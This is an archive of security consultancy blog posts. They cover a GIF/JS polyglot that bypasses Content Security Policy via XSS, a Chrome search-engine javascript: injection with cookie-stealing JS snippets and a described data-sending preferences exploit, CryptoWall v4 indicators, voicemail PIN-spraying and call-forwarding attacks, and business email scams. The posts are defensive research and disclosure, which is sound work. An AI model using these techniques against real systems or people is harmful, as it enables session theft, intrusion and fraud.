Category Archives: Vulnerability Research

Malicious Memes

The content of this article was also presented by Sam at the 2016 Unrest Conference.

In the past, allowing clients to upload images to your web application was risky business. Nowadays, profile pictures and cat images are everywhere on the Internet and robust procedures exist for handling image uploads, so we can rest assured they protect us from the nasties. Or can we?


Image polyglots are one way to leverage vulnerabilities in web applications and execute malicious scripts in a victim’s web browser. They have the added bonus of bypassing certain security controls designed to mitigate these script injection attacks. This blog will explain how to build an image polyglot and demonstrate how using one can bypass a server’s Content Security Policy (CSP).

Content Security Policy (CSP)

The CSP is set by the web server in the form of a header and informs the user’s browser to only load and execute objects that originate from a whitelisted set of sources. For example, a common implementation of the CSP header ensures the browser only accepts scripts that come from your domain and blocks the use of inline scripts (i.e., scripts blended directly with other client-side code such as HTML). CSP is a recommended security header for mitigating the damage caused by Cross-Site Scripting vulnerabilities, as it narrows the set of locations from which scripts can be loaded. HTML5 Rocks has a great introduction to Content Security Policy if you would like to learn more.
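For illustration, a policy along these lines would enforce the behaviour described above; the directive names are standard CSP, and 'self' restricts script loading to the page’s own origin while also blocking inline scripts:

```
Content-Security-Policy: default-src 'self'; script-src 'self'
```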

Cross-Site Scripting (XSS)

XSS attacks are a type of web application injection exploit in which an attacker is able to embed their own client-side code into a web application and have it rendered in the browser as part of the webpage. Usually caused by a lack of (or poorly implemented) user input sanitisation and encoding, attackers use XSS vulnerabilities to inject malicious JavaScript (JS) that can be used to hijack users’ sessions, modify content on the webpage, redirect the visitor to another website or ‘hook’ the victim’s browser. Browser hooking is a technique for leveraging XSS vulnerabilities in which the injected script loads further scripts from a server operated by the attacker, granting greater control over the hooked browser’s behaviour.

XSS is one of the most common web application vulnerabilities and many major websites — including Google, PayPal, eBay, Facebook and the Australian Government’s My Gov site — have been found to have XSS vulnerabilities at some point in time. Reflected XSS is a type of attack in which the injection is reflected back to the victim, rather than being stored on the web server. Reflected attacks are usually executed when a victim is coerced into clicking a link containing the malicious payload. The malicious script is considered to be ‘inline’ with the web application as it is loaded alongside other client-side code like Hyper Text Markup Language (HTML) and not from a dedicated JS file. CSP can be configured to deny inline scripts from executing in the browser, which in theory mitigates the dangers of a reflected XSS and protects the user.

CSP in action — and how to get around it

Take for example a web application that allows you to upload and view images and has an aggressive CSP that only permits loading scripts from the application’s domain while denying the use of inline scripts. You’ve found a great reflected XSS vulnerability; however, your payload doesn’t execute because it’s inline and blocked by the CSP. You attempt to upload your payload through the image upload but the web application rejects it for not being a valid image. An image polyglot can help you get around those pesky security controls.


In humans, a ‘polyglot’ is someone who speaks several languages. In the computer world it means code that is valid in several programming languages.

Figure 1 — Valid ‘C’ programming code

Figure 2 — Valid ‘Perl’ programming code

The code snippets in Figure 1 and Figure 2 are identical, yet each is valid in its respective language. This is polyglot code and is the underlying mechanism for the attack detailed in this tech blog.

GIF Images

You have more than likely heard of the Graphics Interchange Format (GIF) image type which has the file extension ‘.gif’. The popular image type was invented in 1987 by Steve Wilhite and updated in 1989. It has since come into widespread use on the Internet largely due to its support for animation.

Figure 3 — An animated GIF image

GIF images only support a 256 colour palette for each frame, which is why GIF images often look poor in quality. Each frame of an animated GIF is stored in its entirety making the format inefficient for displaying detailed clips of any longer than a few seconds (incidentally, while the pronunciation is often disputed, I can confirm for you right now it’s pronounced ‘jiff’ after an American brand of peanut butter — no joke).

Figure 4 — The constructs of a GIF image sourced from:

The attack this blog will demonstrate only requires knowledge of the ‘Header’, ‘Trailer’ and ‘Logical Screen Descriptor’ (LSD). The data between these represents the frames of a GIF image, and at least one frame is expected in a valid GIF. All GIF images begin with the signature ‘GIF’ followed by the version, ‘87a’ or ‘89a’, in the header.

Figure 5 — The header of a GIF version 89 image in hexadecimal and corresponding human readable ASCII encoded output

The following seven bytes of a GIF image make up the LSD, which informs the image decoder of properties that affect the whole image. The first four bytes are the canvas width and height, each stored as an unsigned 16-bit integer: a number between 0 and 65,535 that cannot be negative (it wouldn’t make much sense to have a negative canvas size!).

Figure 6 — The LSD of a GIF image sourced from

It is also important to understand that this data in the GIF format is represented in ‘little-endian’, which means the least significant byte is read first by the decoder. In Figure 6 we can see the canvas size is stored as width: ‘0A00’ and height: ‘0A00’. While seemingly backwards for humans, little-endian means the decoder reorders each pair to width: ‘000A’ and height: ‘000A’, which is 10 by 10 pixels. Lastly, the trailer (sometimes referred to as the footer) of the image is the hexadecimal byte ‘3B’, which when encoded as ASCII represents a semicolon.
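This byte-order handling can be verified in a few lines of Python (standard library only):

```python
import struct

# The LSD stores canvas width and height as little-endian unsigned 16-bit integers.
lsd = bytes.fromhex("0A000A00")            # width: 0A 00, height: 0A 00
width, height = struct.unpack("<HH", lsd)  # "<" = little-endian, "H" = uint16
print(width, height)                       # 10 10
```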

Figure 7 — The hexadecimal and ASCII encoded output showing the footer of a GIF image

Most image decoders, including browsers, will ignore anything after the trailing semicolon, making it a good place to put the bulk of our JS payload. However, if the web application manipulates the image, data after the semicolon will likely be discarded. Hence, it’s important that we can still access the raw, unedited image after it’s uploaded to the server — see the ‘Limitations’ section of this blog for more information.

Creating the GIF/JS Polyglot

Figure 8 — Our ‘soon to be JS’ GIF sourced from

To create our malicious image, we are using the small, non-animated GIF image seen in Figure 8. Its ASCII encoded output is represented below:

Figure 9 — ASCII encoded output of GIF image data

One method of creating GIF/JS polyglots is to manipulate the LSD so that it begins a JS comment block, as seen in Figure 10. After the GIF trailer we close the comment block and include our payload.

Figure 10 — GIF image with JS payload appended

You will notice that in order to insert the ‘/*’ (begin comment block) JS sequence we have changed the value of the first two bytes of the LSD, which correspond to the canvas width. The hexadecimal value of ‘/*’ is ‘2F 2A’, which when interpreted as little-endian by the image decoder is ‘2A 2F’ = 10799. While we still have a valid GIF image, it has a pretty wacky canvas size as seen in the output below:
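The whole manipulation can be sketched in Python. This is a minimal stand-in rather than a real image (the frame data is omitted), and the alert payload is a placeholder:

```python
import struct

# A minimal stand-in for GIF data: 6-byte header, 7-byte LSD, then the
# (omitted) frame data, ending with the 0x3B ';' trailer byte.
header = b"GIF89a"
lsd = bytes.fromhex("0A000A00") + b"\x00\x00\x00"  # width, height, packed, bg, aspect
gif = bytearray(header + lsd + b"\x3b")

# Step 1: overwrite the canvas width with "/*" to open a JS comment block.
gif[6:8] = b"/*"

# Step 2: append "*/=1;" and the JS payload after the trailer.
gif += b'*/=1;alert("xss");'

# Still starts with a valid GIF signature ("magic numbers")...
assert gif[:6] in (b"GIF87a", b"GIF89a")
# ...but the width is now 0x2A2F = 10799 pixels.
width = struct.unpack("<H", gif[6:8])[0]
print(width)  # 10799
```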

Figure 11 — EXIFtools output of GIF/JS polyglot image showing a canvas size of 10799x10px

However, other than being oddly sized, the image is still perfectly valid and the image decoder will read the rest of the image data normally, disregarding our JS code after the image trailer.

Figure 12 — The GIF/JS polyglot as interpreted by a JS engine

When we try to execute the image as JS, the engine reads the GIF header as a variable name, ignores the comment block and then continues by setting the variable equal to ‘1’, a dummy assignment that keeps the JS syntax valid. Then our payload is executed.

The image passes standard image validation techniques used by web applications, which often rely on confirming the ‘magic numbers’ (the signature bytes at the start of the file) of the image. Once our image is uploaded to the server, we effectively have a valid JS file originating from the web application’s domain, which falls within the scope of the CSP.

As it stands, the image is loaded into the web application through the HTML ‘img’ tag, which tells the browser to interpret the data stream as image data. In order to circumvent this and trigger our JS code, we leverage our XSS vulnerability to load the image via the ‘src’ attribute of an HTML ‘script’ tag.
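Hypothetically, if the uploaded polyglot were served from /uploads/avatar.gif (a placeholder path), the injected markup would look something like:

```html
<script src="/uploads/avatar.gif"></script>
```

Because the script now loads from the application’s own domain, it satisfies a same-origin script-src directive.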

Figure 13 — Leveraging the reflected XSS to execute our polyglot

Figure 14 — XSS payload executing in browser bypassing CSP

Why GIFs?

The convenient design structure of the GIF file format allows us to leverage the image header and manipulate the canvas sizes defined in the LSD without destroying the properties of the image for the image decoder.


Limitations

  • Web applications that restrict image uploads to a certain canvas size can hinder the effectiveness of an image polyglot. Due to the limited set of JS characters that can be used in the LSD, the canvas sizes are often unusually large and cannot conform to strict image upload pixel rules.
  • Server-side image manipulation that resizes the image will edit the canvas size in the LSD, corrupting our polyglot. If it’s not possible to locate the original unedited image through the web application, then the image will not execute as JS.


While Figure 14 demos a rather mundane script execution, it confirms we now have a method of uploading and executing an XSS attack regardless of the CSP directive. The stored JS in our image acts as an uploaded script file satisfying the CSP’s same-origin requirements.

This attack proves that CSP isn’t a catch-all XSS filter and can be circumvented in some cases. In application penetration testing, GIF/JS polyglots are a powerful tool for leveraging the consequences of improper output sanitisation.

While still recommended, the CSP header should be implemented with the understanding that it is a last line of defence against XSS attacks, not a guarantee of protection for your web app. Ultimately, secure development processes and proper output encoding are the best way to protect web applications against XSS.

Article by Sam Reid, Security Specialist, Hivint

Google Chrome — Default Search Engine Vulnerability


In December 2015, Hivint’s Technical Security Specialist — Taran Dhillon — discovered a vulnerability in Google Chrome and the Chromium browser that allows an attacker to intercept sensitive information, authentication data and personal information from a target user.

This issue has been reported to the Google/Chromium team but as of July 2016 has not been rectified.

The vulnerability in the Chrome browser is due to the “Default Search Engine” functionality not restricting user input and allowing JavaScript code to be inserted and executed. The Default Search Engine functionality allows users to save and configure preferred search engines. When a user performs a search from the web browser by entering the search text directly into the URL bar, the web browser uses the default search settings configured earlier to perform this search.

Chrome Default search settings — with the Google search engine configured as the default search engine

To prevent unintended and unauthorised actions, data provided by users should be sanitised and/or restricted before it is processed. In this case, the malicious input is JavaScript code supplied through the search engine URL field. Input sanitisation involves checking the text/characters a user enters and ensuring they do not contain any malicious code.

Given that Google Chrome is the most popular web browser, used by approximately 71.4% of all internet users, this vulnerability presents a significant security risk.

What is JavaScript and how can it be exploited maliciously?

JavaScript is one of the core programming languages used for web applications and its main function is in modifying the behaviour of web pages. It is extremely flexible and is often used to dynamically change the content on websites to provide a rich user experience.

Although JavaScript is normally used to improve a user’s web experience, it can also be used in malicious ways which include stealing personal information and sensitive data from target users.

Examples of JavaScript that can be used for malicious purposes using the vulnerability discussed in this article are:

  • escape(document.cookie); – which can be used to steal a user’s browser cookies. Browser cookies contain information about the current user and may include: authentication information (generated when a user logs into a website to uniquely identify the user’s session), the contents of a user’s shopping cart (on an e-commerce site) and tracking information (used to track a user’s web-browsing habits, geographic location and source IP address).
  • escape(navigator.userAgent); – used to obtain a target user’s web-browser type.
  • escape(document.baseURI); – contains the URL of the website the user is currently browsing.

The examples above are only a small sample of JavaScript that can be used for malicious purposes with the vulnerability identified in this article.

How to check if you’re vulnerable

To check if your web-browser (Google Chrome / Chromium) is vulnerable, perform the following steps:

  1. Navigate to Settings → Manage Search Engines.
  2. Scroll to the bottom of the Other Search Engines table.
  3. Click in the box marked Add a new search engine and enter any text, e.g. poison.
  4. Click in the box marked Keyword and enter any text, e.g. poison.
  5. Click in the box marked URL with %s in place of query and paste in the following text: javascript:window.location=alert(1);
  6. If the colour of the text-box turns from red to white, this indicates your browser is vulnerable.

Exploit Example

Replacing the Chrome “master_preferences” file (a file which is used by Chrome to set all of its default settings) is a method an attacker can use to deliver the exploit to a victim machine.

The code below creates a malicious “master_preferences” file which redirects all searches performed by the victim user to the attacker’s web-server (where the attacker receives the victim’s browser cookies, current browser URL and browser software information) and then sends the victim back to their original Google search.

This results in a seamless compromise of the victim user’s web browser that is extremely difficult for them to detect:
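As a rough, hypothetical sketch only (the field names follow the general shape of Chrome’s JSON-based master_preferences file of that era but are assumptions, and the search_url value is a descriptive placeholder rather than the original exploit code), the idea is to make the default search provider a javascript: URL:

```json
{
  "default_search_provider": {
    "enabled": true,
    "name": "Google",
    "keyword": "google.com",
    "search_url": "javascript:/* send document.cookie, document.baseURI and navigator.userAgent to the attacker's server, then redirect to the real Google search for the query */"
  }
}
```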

Video Demo

This video demonstrates how the vulnerability can be exploited:

  1. The user is tricked into loading malicious software.
  2. The malicious software containing the exploit is executed on the victim’s machine when the user opens the Chrome browser and searches ‘pwned’.
  3. Information is transmitted to and intercepted by the attacker, and the victim is then unknowingly redirected back to their search, with the attack remaining undetected.

How can I prevent myself from being exploited?

Currently, the only effective mitigation is to uninstall and not use Google Chrome or Chromium. Additionally, do not click on untrusted links on websites or open attachments or links in emails that are unexpected, from untrusted sources or which otherwise seem suspicious.

Article by Taran Dhillon, Security Specialist, Hivint

CryptoWall — Analysis and Behaviours

Key Behaviours of CryptoWall v4

This document details some initial research undertaken by Hivint into the newly released CryptoWall version 4 series of ransomware. A number of organisations we have worked with have experienced infections by CryptoWall and its variants, in some cases leading to severe consequences.

This research paper outlines more information about the latest version of CryptoWall, as well as providing guidance on possible methods for creating custom security controls within your IT environment to mitigate the threat of CryptoWall infections, as well as how to detect and respond to these infections if they do occur. Some lists of known payload sources, e-mail domains and payment pages associated with CryptoWall are also provided at the end of this paper for use in firewall rulesets and/or intrusion detection systems.

CryptoWall version 4 exhibits the following new behaviours:

  • It now encrypts not only the data in your files, but the file names as well;
  • It still includes malware dropper mechanisms to avoid anti-virus detection — but this new version also possesses vastly improved communication capabilities. It still uses TOR, which it may be possible to block with packet-inspection functions on some firewalls. However, it has a modified version of the protocol that attempts to avoid being detected by 2nd generation enterprise firewall solutions.
  • It appears to inject itself into or migrate to svchost.exe and iexplore.exe. It also calls bcdedit.exe to disable the start-up restore feature of Windows. This means the system restore functions that were able to recover data in previous versions of the ransomware no longer work.

Infection Detection

Antivirus detection for this variant is generally very low, but some work on detection is taking place. ESET’s anti-virus solution, for example, detects the .js files used by CryptoWall in emails as JS/TrojanDownloader.Agent.

The most reliable method to detect CryptoWall v4 infections when creating rules in intrusion detection systems, firewalls, antivirus systems or centralised log management servers is to alert on the creation of the following filenames, which are static within CryptoWall v4:


It’s also worth noting that having in place a comprehensive, regular and consistent backup process for key organisational data is extremely important to combat the threat posed by ransomware such as CryptoWall v4. This will facilitate the prompt restoration of important files, limiting impacts on productivity.

Limiting the risk of Infection

CryptoWall v4 connects to a series of compromised web pages to download the payload. Some of the domain names hosting compromised pages are listed below — a useful step would be to create a regular expression on firewalls and other systems to block access to these domains:


Note that the list of compromised web pages is constantly evolving and so the implemented regular expression will require ongoing maintenance within corporate networks. See the lists at the end for more domains.
In the new version of CryptoWall, infected files have their file names appended with pseudorandom strings. As a result, filename encryption is harder to identify through pure examination of file extension names, unlike past versions of CryptoWall (in which ‘.encrypted’ was appended to the end of encrypted files). Thus, implementing an alert or blocking mechanism becomes more challenging.
However, it is possible to implement regular expression-based rules by considering the executable file names which are downloaded as part of an attempt to infect a system with CryptoWall v4. Two such names are known to be associated with CryptoWall v4 infections:

It may also be possible to write detection rules to find a static registry key indicating the presence of a CryptoWall infection. This can then be used to search over an entire corporate domain to locate infected machines, or possibly used in anti-virus / IDS signatures. An example is:

  • HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run a6c784cb "C:\Users\admin\AppData\Roaming\a6c784cb4ae38306a6.exe"

Another step to consider is writing a custom list for corporate firewalls containing the domains that phishing e-mails associated with CryptoWall v4 infections are known to come from, as well as a list of known command-and-control servers. For example, one of the first e-mail domains to be reported was In addition, some of the known command and control hosts that the ransomware makes calls to include:


CryptoWall v4 also makes use of Google’s service for DNS — this behaviour can be taken into account as part of determining whether there are additional security controls that can be implemented to mitigate the risk of infection. In addition, it appears that CryptoWall v4 makes outgoing calls to the following URLs (among others). These may also be useful in developing infection detection controls:

The initial controls we have worked with most customers to implement on their corporate networks included adding a rule to anti-virus detection systems to identify the ransom note file when it is created (i.e.: HELP_MY_FILES.txt). This enables network administrators to be promptly alerted to infections on the network. This is a valuable strategy in conjunction with maintaining lists of known bad domains related to the malware’s infection sources and infrastructure.
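As a minimal sketch of that detection idea (the scan root is a placeholder path, and a real deployment would express this as an AV/IDS or log-management rule rather than a script):

```python
import os

RANSOM_NOTE = "HELP_MY_FILES.txt"  # ransom note filename dropped by CryptoWall v4

def find_infections(root):
    """Walk a directory tree and report any paths containing the ransom note."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if RANSOM_NOTE in filenames:
            hits.append(os.path.join(dirpath, RANSOM_NOTE))
    return hits

# Example: scan a file share and alert on any hits (placeholder path).
for hit in find_infections("/srv/user-shares"):
    print("possible CryptoWall infection:", hit)
```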

Lists of known payload sources, e-mail domains and payment pages associated with CryptoWall

We’ve included the following lists of payload sources, domains and pages associated with CryptoWall v4 infections — which some of our clients have used — to identify activity potentially associated with the ransomware. These can be used in addition to blacklists created and maintained by firewall and IDS vendors:

  • Decrypt Service — contains a small list of IP addresses for the decryption service. This is the page victims are directed to in order to pay the authors of CryptoWall for the decryption keys. These servers are located on the TOR network but use servers on the regular web as proxies.
  • Email Origin IPs — contains IP addresses of known sources of CryptoWall v4 phishing e-mail origin servers — can be used in developing black lists on e-mail gateways and filtering services.
  • Outgoing DNS Requests — contains a list of IP addresses that CryptoWall v4 attempts to contact.
  • Payload Hosts — contains known sources of infection — including compromised web pages and other infection sources.

CryptoWall associated IP addresses

Article by John McColl, Principal Advisor, Hivint

Voicemail and VOIP

Commonly overlooked security risks


Every company has a phone system of some type and, just like smartphones, these systems often offer much more than basic PABX functionality — technologies such as VoIP, video conferencing, Unified Communications platforms and cloud-based PABXs are all becoming par for the course. Most, if not all, of these systems also include integrated voicemail functionality.

This article considers some of the avenues through which attackers may look to compromise the security of a company’s phone systems.


There are many reasons attackers may be interested in a company’s phone system, including:

  • Using it to make fraudulent calls;
  • Aiding in social engineering attacks;
  • Eavesdropping on sensitive calls;
  • Harvesting sensitive information from voicemails;
  • Compiling internal directories of company staff; and
  • Attempting to obtain call detail records for market intelligence and industrial espionage.

Complicating matters is that, unlike dedicated VoIP and video conferencing systems, which are often audited and maintained by IT security teams, traditional PABX, IVR and voicemail systems are often overlooked or fall outside the management purview of the IT and security teams.

Voicemail is still relied upon for everyday use by many organisations, and sensitive information is commonly left in voicemail messages. A motivated attacker targeting a company is highly likely to be able to gain valuable information by listening to the voicemail of system administrators or executives over a period of time.

With cheap VoIP services being readily available it is also simple for attackers to automate and scale up their attacks to make multiple simultaneous calls and complete them faster. There are many ways to automate phone attacks, and it is easy for an attacker to write a script or use existing software to automate a range of attacks, including those outlined below.

Types of Voicemail and VOIP Attacks

Brute force attacks

Having a four-digit PIN as the de facto standard for voicemail authentication means an attacker has a reasonable chance of guessing the PIN manually, using nothing more than the phone keypad. Even with longer PINs, common patterns and repeating numbers are used by staff so often that an attacker is likely to work out the PIN using a PIN list instead of having to enter every possible combination of digits.

Most voicemail and phone systems do not support account lockouts, nor do they have other security controls, such as logging and alerting, that are commonly applied to other IT systems. As a result, a successful PIN brute force attack to gain access to a staff member’s voicemail box is unlikely to prove difficult for a determined attacker. Additionally, there are methods to bypass lockout timers in those instances where they are in place. One technique that is almost always successful on large voicemail systems is attempting two or three common PINs against every extension or user account, which avoids triggering any account lockouts that are implemented.
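That ‘few PINs, many extensions’ ordering can be sketched as follows (the PIN list and extension range are purely illustrative):

```python
from itertools import product

# Horizontal ("spraying") order: try each common PIN against every extension
# before moving to the next PIN, so no single account accumulates enough
# consecutive failures to trigger a lockout.
common_pins = ["1234", "0000", "1111"]          # illustrative common-PIN list
extensions = [str(n) for n in range(100, 104)]  # illustrative extension range

attempts = [(ext, pin) for pin, ext in product(common_pins, extensions)]
print(attempts[:4])
# Each extension receives only len(common_pins) attempts in total.
```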

Once an attack run is complete the attacker may well have access to several voicemail accounts.

Directory reconnaissance

The same automation that can be applied to PIN brute force attacks can also be used for other attacks against phone systems. One example is the creation of internal directories. An attacker can use the “find extension” feature of modern PABXs and voicemail systems to make a list of names, extensions and sometimes job titles within a company. They can also do this by calling and making a note of every greeting for every extension if the PABX doesn’t have a names directory feature.

Call-forwarding attacks

Another use attackers have for voicemail is the call forwarding feature, which can be used for free phone calls or to aid in social engineering attacks.

Getting free phone calls is the simplest example. An attacker who has compromised a voicemail box sets up a call forward to the mobile, overseas or other toll number they want to call. They then call back on the local DDI number or the company’s main toll-free number, enter the extension number and wait for the call forward to connect them to their pre-programmed toll number.

This attack can be reversed as well — an attacker can also use a compromised voicemail box to receive incoming calls using the call forwarding feature to forward calls to a VOIP or pre-paid phone controlled by the attacker.

They then have control of an extension on the company’s phone system, which they can give to external parties to call back on so they appear to be inside the company’s office, an invaluable means of facilitating further social engineering attacks.

Leveraging Caller ID

Most phone systems, when call-forwarding is used, display the caller-ID of the voicemail extension rather than the number of the originating party.

An attacker may be able to leverage the call-forward feature to masquerade as a known external party, such as appearing to be a known vendor or to be calling from inside the target company’s building. This can gain greater traction for social engineering purposes.

On a penetration testing engagement some years ago, my colleagues and I took over a manager’s extension at corporate headquarters and set up a call forward to the security desk at one of their rural sites. We called ahead to the security desk to add our names to the visitor register. The security desk asked very few questions because their phone displayed the call as originating from the manager’s phone at the organisation’s headquarters.

When we arrived, the security desk was expecting us and allowed us to enter without any restrictions.


The attack scenarios above relate to simple voicemail systems, which most people overlook, considering them to be a straightforward way to store and retrieve messages. However, when you include customer-facing IVRs, VoIP systems, PABX systems, teleconferencing and video conferencing systems, Unified Communications systems, call-queue management systems and the endless other applications of modern phone systems, the possible vulnerabilities that can be exploited by attackers are almost endless.

Large companies often own a block of numbers, generally in lots of ten thousand. It is a good idea to periodically audit these number blocks to classify all lines, then perform an audit of the possible attack vectors of all the phone systems connected to them.

Practicing the same security hygiene for voicemail that you do for other systems is critical, for example:

  • Disabling default accounts;
  • Auditing voicemail boxes for common PINs, or disallowing common or simple PINs;
  • Setting a minimum PIN length of six digits;
  • Setting unique temporary PINs when provisioning new voicemail boxes;
  • Setting up lockout timers that don’t lose their state over multiple calls;
  • Disabling call forwarding features;
  • Restricting allowed forwarding numbers to local mobiles and landlines only;
  • Deactivating unused voicemail boxes; and
  • Applying logging and alerting if possible.

With some phone systems this is often easier said than done. We hope this article gets you thinking about how your company uses and manages phone systems and how they might be abused by attackers if appropriate vigilance is not exercised.

Article by John McColl, Principal, Hivint

The Growth of the Business Email Scams Threat

In the last year, there has been a trend towards the commission of payment scams that target employees of companies by attempting to convince them to transfer money to cyber criminals. Commonly referred to as business email compromise (BEC) scams, they generally involve scammers sending emails that appear to come from senior staff at an organisation (hence sometimes being referred to as “CEO fraud”) and requesting that a sum of money be transferred to a third party’s bank account (controlled by the scammers). Brian Krebs has written about these attempts in his blog, here and here. According to the Federal Bureau of Investigation (FBI), these scams have generated reported losses of $1.2 billion internationally between October 2013 and August 2015.

Two recent examples of these scams reported to us by our clients demonstrate the different types of organisations that can be targeted by these scams.

The first scam described below targeted a sporting club and demonstrates how a business email scam can be executed in a relatively simple and innocuous fashion. The second is an example of a slightly more complex version targeted at a financial technology company that required more effort to execute, and which ultimately needed execution of the company’s incident response plan to investigate and resolve the incident.

Case Study — A Sports Club is Targeted

The first business email scam targeted a small sporting club that had published the contact details and roles for all of its board members on its website. This meant the scammer had to exercise a minimum amount of effort in order to craft the scam — all the contact details and roles for the board members were clearly available. Initial contact was made by the scammer via email (posing as the President) to the Treasurer, John, to start the conversation.

In this case, the Treasurer became suspicious and was quick-thinking enough to call the President to seek verbal confirmation of the transfer request. This gave the game away and revealed that the club was being scammed.

Hivint was contacted to provide further analysis and advice on the email scam, as the club staff members who were targeted were unsure whether the scam indicated a system compromise or similar. Once the emails were received, a simple check of the original email's headers identified the ruse.

As the email headers revealed, the "Authenticated sender" (the scammer's real email address) differed from the address displayed in the email itself. A Google search showed the address had been used in previous scams.

In addition, the "Reply-To" address did not actually belong to the club's President, and directed the target's response to an email address controlled by the scammer. A check of the return email address when replying would also have given this away.
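This kind of header check is easy to automate. A minimal sketch in Python, using only the standard library's email parsing, flags messages whose Reply-To domain differs from the From domain; the sample message and addresses below are purely illustrative:

```python
# Flag a mismatch between the From and Reply-To headers of a raw email.
# The sample message and addresses are illustrative, not from a real scam.
from email import message_from_string
from email.utils import parseaddr

def reply_to_mismatch(raw_email: str) -> bool:
    """Return True if the Reply-To domain differs from the From domain."""
    msg = message_from_string(raw_email)
    _, from_addr = parseaddr(msg.get("From", ""))
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    if not reply_addr:
        return False  # no Reply-To header; nothing to compare
    from_domain = from_addr.rpartition("@")[2].lower()
    reply_domain = reply_addr.rpartition("@")[2].lower()
    return from_domain != reply_domain

sample = (
    "From: Club President <president@club.example.org>\r\n"
    "Reply-To: president.club@freemail.example\r\n"
    "Subject: Urgent transfer\r\n"
    "\r\n"
    "Please pay the attached invoice today."
)
print(reply_to_mismatch(sample))  # True: replies go to a different domain
```

A check like this on inbound mail will not catch every scam, but it would have flagged both emails described in this case study.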

The Second Scam — A Financial Technology Company

The next business email scam Hivint was made aware of came from a financial technology company we work with, which had received a phishing email similarly requesting that the finance team transfer money.

This attempt took more effort as the scam clearly involved more research and customisation by the scammer.

While the content of the email was consistent with most business email scams (see below), there were some distinguishing features which contributed to the scam almost being successful.

In this case, the attacker registered a domain name very similar to the target business's, with a single extra letter added. This meant the reply-to address closely resembled an address on the company's actual registered domain, making the scam hard to detect without more than a cursory examination of the reply-to address.
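Lookalike domains of this kind, one character insertion away from the real domain, can be caught mechanically. A minimal sketch, assuming a known set of trusted domains (the domain names below are illustrative):

```python
# Detect sender domains that are within one edit (insert, delete, or
# substitute) of a trusted domain, e.g. one extra letter added.
def edit_distance_le_1(a: str, b: str) -> bool:
    """True if a and b differ by at most one character edit."""
    if a == b:
        return True
    if abs(len(a) - len(b)) > 1:
        return False
    if len(a) > len(b):
        a, b = b, a  # ensure a is the shorter (or equal-length) string
    for i in range(len(a)):
        if a[i] != b[i]:
            if len(a) == len(b):
                return a[i + 1:] == b[i + 1:]  # one substitution
            return a[i:] == b[i + 1:]          # one insertion in b
    return True  # b is a plus one trailing character

def is_lookalike(sender_domain: str, trusted: set[str]) -> bool:
    """Flag domains that nearly, but not exactly, match a trusted domain."""
    return sender_domain not in trusted and any(
        edit_distance_le_1(sender_domain, t) for t in trusted
    )

print(is_lookalike("exampple.com", {"example.com"}))  # True: extra letter
print(is_lookalike("example.com", {"example.com"}))   # False: exact match
```

A mail gateway rule built on this idea can quarantine or flag messages whose sender domain is suspiciously close to your own.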


There are a number of attacks which are high volume/low value. For example, ransomware such as CryptoLocker only extracts payment if the ransom is within the victim's "pain point" or ability to pay. A business email scam, by contrast, has no coercion behind the request for payment: it only works if the victim doesn't realise they're being scammed. That takes effort, which means the payoff has to be worth it for the perpetrator.

Even spending a few weeks researching a victim and crafting an attack for a five-figure payout would still be highly profitable for a scammer, and the growing $1.2 billion pool of reported losses shows just how lucrative these scams can be.

The continuing growth in these scams demonstrates that this threat is worth countering, and there are some fairly basic steps you can take to reduce both the risk of these attacks being attempted against your company and the likelihood that they will succeed.


Exercise proper security hygiene to protect your online identity.

Don't publish the contact details and position titles of specific staff in publicly accessible places on the internet, particularly staff with payment-related responsibilities. Instead, use a contact form that sends to a generic email address, and distribute messages to the relevant personnel from there.

Separation of Duties

Should a request come to an individual for payment of a sum of money (whether for an invoice or otherwise), a check should be made that the payment is in fact legitimate (e.g. through verbal confirmation, or confirmation there is an associated Purchase Order number or invoice) and approved by a relevant authority.
In short, no business process should allow a money transfer to be triggered solely by the receipt of an email.

Security Awareness

Ensure education on email scams is included in your organisational security awareness program.

Check your registered domains

Andrew Horton's URLCrazy (included in Kali Linux) can be used to identify registered domain names similar to your business's.
Buy the domains you can, and consider blocking emails from similar domains already registered, or generating an alert when an email arrives from one of them.
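To illustrate the kind of permutations a tool like URLCrazy enumerates, here is a simplified sketch that generates character omissions, duplications, and adjacent swaps for a domain; this is a toy approximation of the technique, not URLCrazy's actual algorithm, and "example.com" is illustrative:

```python
# Generate simple typo variants of a domain label: omit a character,
# duplicate a character, or swap two adjacent characters. This is a toy
# approximation of what typosquatting tools such as URLCrazy enumerate.
def typo_domains(domain: str) -> set[str]:
    label, dot, tld = domain.partition(".")
    variants = set()
    for i in range(len(label)):
        variants.add(label[:i] + label[i + 1:])                 # omission
        variants.add(label[:i] + label[i] * 2 + label[i + 1:])  # duplication
        if i < len(label) - 1:                                  # adjacent swap
            variants.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
    variants.discard(label)  # drop any variant identical to the original
    return {v + dot + tld for v in variants if v}

candidates = typo_domains("example.com")
print("exampple.com" in candidates)  # True: a duplication variant
```

Feeding the resulting candidate list into WHOIS lookups (or your mail gateway's block/alert rules) shows which lookalikes are already registered and which are still available to buy defensively.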

And Finally

Remember, if something about an email doesn't seem right, making simple checks that you're corresponding with a legitimate sender will go a long way towards ensuring you are not defrauded. In particular:

  • Double-check whom you're actually responding to: if the reply address changes once you've hit "reply", the email may have been sent by a scammer. If the email looks legitimate, check the spelling of the address to ensure the domain name is not a misspelt lookalike.
  • Contact the purported sender of the email using a known telephone number (i.e. not a contact number given in the email) before executing any money transfers. Even if an attacker has gone beyond spoofing an email address and has compromised your email environment, using an "out-of-band" method to contact the legitimate person can help verify the authenticity of the request.

And finally, should you still fall victim to a payment scam, contact your financial institution as soon as possible.

By Ben Waters, Senior Security Advisor at Hivint. For more of Hivint’s latest cyber security research, as well as to access our extensive library of re-usable cyber security resources for organisations, visit Security Colony